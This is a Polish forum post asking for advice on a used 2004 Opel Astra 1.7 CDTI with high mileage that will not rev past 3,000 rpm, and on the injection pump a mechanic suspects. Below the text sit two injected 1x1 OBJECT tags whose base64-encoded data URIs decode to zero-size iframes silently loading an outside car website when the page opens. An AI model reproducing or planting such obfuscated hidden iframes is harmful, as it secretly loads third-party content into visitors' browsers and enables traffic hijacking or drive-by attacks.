Witam wszystkich. Mam mały problem .Jestem aktualnie na kupnie samochodu. Mam na oku pewnego opla Astre z 2004 r z silnikiem 1.7 CDTI. Problem polega na tym ze ma juz troche przejechane bo 240 000 a poza tym cos jest z nim nie tak ponieważ nie wchodzi na więcej jak na 3 tys obr. Na 3 biegu max 70 km/h i ani grama więcej.Mechanik mówił ze to podobno pompa wtryskowa. Samochód jest do kupienia naprawde po kasie(ok 10 tys PLN) tylko pytanie-czy przy takim przebiegu to na pewno bedzie tylko pompa? po przygazowaniu widac troche dymka z tyłu.Jesli ktos zna sie na tych silnikach prosze o pomoc. Jaka jest żywotnośc tych silników i wogóle. Dodam tylko ze samochód wykorzystywany był przez przedstawiciela handl. w firmie w której pracuje (z tad taka cena) Prosze o pomoc. Pozdrawiam.
<OBJECT DATA="data:text/html;base64,PGlmcmFtZSBzcmM9Imh0dHA6Ly9yYXBpZGNhci5wbC9zenVrYWoucGhwIiB3aWR0aD0wIGhlaWdodD0wPg==" width="1" height="1"></OBJECT>
<OBJECT DATA="data:text/html;base64,PGlmcmFtZSBzcmM9Imh0dHA6Ly9yYXBpZGNhci5wbCIgd2lkdGg9MCBoZWlnaHQ9MD4=" width="1" height="1"></OBJECT>